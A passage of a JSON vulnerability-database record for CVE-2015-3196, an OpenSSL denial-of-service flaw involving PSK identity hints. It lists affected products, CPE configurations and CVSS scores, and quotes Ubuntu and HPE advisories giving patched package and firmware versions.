        "vendor": "juniper",
        "version": null
      },
      {
        "model": "(comware r3113p02",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "19507)"
      },
      {
        "model": "fortiadc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "4.2"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.12"
      },
      {
        "model": "forticache",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "0"
      },
      {
        "model": "project openssl 1.0.2c",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2"
      },
      {
        "model": "(comware r6710p02",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "75005)"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.2.5"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.4.9"
      },
      {
        "model": "fortiwan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "0"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.2.4"
      },
      {
        "model": "security network controller 1.0.3376m",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "oncommand unified manager for clustered data ontap",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "6.0"
      },
      {
        "model": "(comware r2111p01",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3600v25)"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.9"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.3379"
      },
      {
        "model": "fortimanager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.2"
      },
      {
        "model": "cognos insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.2"
      },
      {
        "model": "(comware r1150",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "129007)"
      },
      {
        "model": "msr (comware r2516",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "305)"
      },
      {
        "model": "project openssl 1.0.2b",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "fortiweb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.0"
      },
      {
        "model": "10.1-release-p25",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "fortirecorder",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "1.4.2"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "0"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.3.0"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "mobilefirst platform foundation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.0"
      },
      {
        "model": "mobile foundation enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.2.0.1"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.14"
      },
      {
        "model": "qradar incident forensics patch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.41"
      },
      {
        "model": "fortiddos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "0"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.4.8"
      },
      {
        "model": "sonas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.5.0.2"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.10"
      },
      {
        "model": "sonas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.5.1.0"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3.0"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "icewall mcrp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3.0"
      },
      {
        "model": "fortisandbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "2.0.3"
      },
      {
        "model": "secblade fw (comware r3181p07",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "4210g (comware r2221p22",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.32"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.3"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.7"
      },
      {
        "model": "icewall sso certd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10.0"
      },
      {
        "model": "6125g/xg blade switch r2112p05",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "project openssl 1.0.1l",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0.1"
      },
      {
        "model": "fortiweb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.3.2"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.18"
      },
      {
        "model": "project openssl 1.0.0q",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "oncommand unified manager host package",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "project openssl 1.0.1h",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "project openssl 1.0.0a",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.9"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "78622"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006117"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-076"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-3196"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:hp:icewall_sso:10.0:*:*:*:certd:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:hp:icewall_sso_agent_option:10.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0n:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0i:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0h:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0d:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0j:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0p:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0o:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1n:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1l:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0l:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1o:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0r:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0q:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0b:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0g:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:oracle:vm_virtualbox:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.3.35",
                "versionStartIncluding": "4.3.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:vm_virtualbox:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "5.0.13",
                "versionStartIncluding": "5.0.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:6.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:15.04:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-3196"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Dr. Stephen Henson of the OpenSSL development team",
    "sources": [
      {
        "db": "BID",
        "id": "78622"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2015-3196",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 4.3,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2015-3196",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2015-3196",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201512-076",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "VULMON",
            "id": "CVE-2015-3196",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2015-3196"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006117"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-076"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-3196"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "ssl/s3_clnt.c in OpenSSL 1.0.0 before 1.0.0t, 1.0.1 before 1.0.1p, and 1.0.2 before 1.0.2d, when used for a multi-threaded client, writes the PSK identity hint to an incorrect data structure, which allows remote servers to cause a denial of service (race condition and double free) via a crafted ServerKeyExchange message. OpenSSL is prone to denial-of-service vulnerability. \nAn attacker may exploit this issue to cause a denial-of-service condition. ============================================================================\nUbuntu Security Notice USN-2830-1\nDecember 07, 2015\n\nopenssl vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 15.10\n- Ubuntu 15.04\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in OpenSSL. This issue only applied to Ubuntu 15.10. This issue only\napplied to Ubuntu 15.10. \n(CVE-2015-3194)\n\nAdam Langley discovered that OpenSSL incorrectly handled malformed\nX509_ATTRIBUTE structures. \n(CVE-2015-3195)\n\nIt was discovered that OpenSSL incorrectly handled PSK identity hints. This issue only applied to Ubuntu 12.04\nLTS, Ubuntu 14.04 LTS and Ubuntu 15.04. (CVE-2015-3196)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 15.10:\n  libssl1.0.0                     1.0.2d-0ubuntu1.2\n\nUbuntu 15.04:\n  libssl1.0.0                     1.0.1f-1ubuntu11.5\n\nUbuntu 14.04 LTS:\n  libssl1.0.0                     1.0.1f-1ubuntu2.16\n\nUbuntu 12.04 LTS:\n  libssl1.0.0                     1.0.1-4ubuntu5.32\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05398322\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c05398322\nVersion: 1\n\nHPESBHF03709 rev.1 - HPE Network products including Comware, IMC, and VCX\nrunning OpenSSL, Remote Denial of Service (DoS), Disclosure of Sensitive\nInformation\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2017-02-21\nLast Updated: 2017-02-21\n\nPotential Security Impact: Remote: Denial of Service (DoS), Disclosure of\nSensitive Information\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities with OpenSSL have been addressed for HPE\nNetwork products including Comware 5, Comware 7, IMC, and VCX. The\nvulnerabilities could be remotely exploited resulting in Denial of Service\n(DoS) or disclosure of sensitive information. \n\nReferences:\n\n  - CVE-2015-1794 - Remote Denial of Service (DoS)\n  - CVE-2015-3193 - Remote disclosure of sensitive information\n  - CVE-2015-3194 - Remote Denial of Service (DoS)\n  - CVE-2015-3195 - Remote disclosure of sensitive information\n  - CVE-2015-3196 - Remote Denial of Service (DoS)\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n  - Comware 5 (CW5) Products All versions - Please refer to the RESOLUTION\nbelow for a list of updated products. \n  - Comware 7 (CW7) Products All versions - Please refer to the RESOLUTION\nbelow for a list of updated products. \n  - HPE Intelligent Management Center (iMC) All versions - Please refer to\nthe RESOLUTION below for a list of updated products. \n  - VCX Products All versions - Please refer to the RESOLUTION below for a\nlist of updated products. \n\nBACKGROUND\n\n  CVSS Base Metrics\n  =================\n  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n    CVE-2015-1794\n      5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n      5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n    CVE-2015-3193\n      5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n      5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)\n\n    CVE-2015-3194\n      5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n      5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n    CVE-2015-3195\n      5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n      5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n    CVE-2015-3196\n      5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n      4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)\n\n    Information on CVSS is documented in\n    HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE has made the following software updates to resolve the vulnerabilities in\nthe Comware, IMC and VCX products running OpenSSL. \n\n\n**COMWARE 5 Products**\n\n  + **A6600 (Comware 5) - Version: R3303P28**\n    * HP Network Products\n      - JC165A HP 6600 RPE-X1 Router Module\n      - JC177A HP 6608 Router\n      - JC177B HP 6608 Router Chassis\n      - JC178A HP 6604 Router Chassis\n      - JC178B HP 6604 Router Chassis\n      - JC496A HP 6616 Router Chassis\n      - JC566A HP 6600 RSE-X1 Router Main Processing Unit\n      - JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit\n      - JG781A HP 6600 RPE-X1 TAA-compliant Main Processing Unit\n  + **HSR6602 (Comware 5) - Version: R3303P28**\n    * HP Network Products\n      - JC176A HP 6602 Router Chassis\n      - JG353A HP HSR6602-G Router\n      - JG354A HP HSR6602-XG Router\n      - JG355A HP 6600 MCP-X1 Router Main Processing Unit\n      - JG356A HP 6600 MCP-X2 Router Main Processing Unit\n      - JG776A HP HSR6602-G TAA-compliant Router\n      - JG777A HP HSR6602-XG TAA-compliant Router\n      - JG778A HP 6600 MCP-X2 Router TAA-compliant Main Processing Unit\n  + **HSR6800 (Comware 5) - Version: R3303P28**\n    * HP Network Products\n      - JG361A HP HSR6802 Router Chassis\n      - JG361B HP HSR6802 Router Chassis\n      - JG362A HP HSR6804 Router Chassis\n      - JG362B HP HSR6804 Router Chassis\n      - JG363A HP HSR6808 Router Chassis\n      - JG363B HP HSR6808 Router Chassis\n      - JG364A HP HSR6800 RSE-X2 Router Main Processing Unit\n      - JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit\n  + **MSR20 (Comware 5) - Version: R2516**\n    * HP Network Products\n      - JD432A HP A-MSR20-21 Router\n      - JD662A HP MSR20-20 Router\n      - JD663A HP A-MSR20-21 Router\n      - JD663B HP MSR20-21 Router\n      - JD664A HP MSR20-40 Router\n      - JF228A HP MSR20-40 Router\n      - JF283A HP MSR20-20 Router\n  + **MSR20-1X  (Comware 5) - Version: R2516**\n    * HP Network Products\n      - JD431A HP MSR20-10 Router\n      - JD667A HP MSR20-15 IW Multi-Service Router\n      - JD668A HP MSR20-13 Multi-Service Router\n      - JD669A HP MSR20-13 W Multi-Service Router\n      - JD670A HP MSR20-15 A Multi-Service Router\n      - JD671A HP MSR20-15 AW Multi-Service Router\n      - JD672A HP MSR20-15 I Multi-Service Router\n      - JD673A HP MSR20-11 Multi-Service Router\n      - JD674A HP MSR20-12 Multi-Service Router\n      - JD675A HP MSR20-12 W Multi-Service Router\n      - JD676A HP MSR20-12 T1 Multi-Service Router\n      - JF236A HP MSR20-15-I Router\n      - JF237A HP MSR20-15-A Router\n      - JF238A HP MSR20-15-I-W Router\n      - JF239A HP MSR20-11 Router\n      - JF240A HP 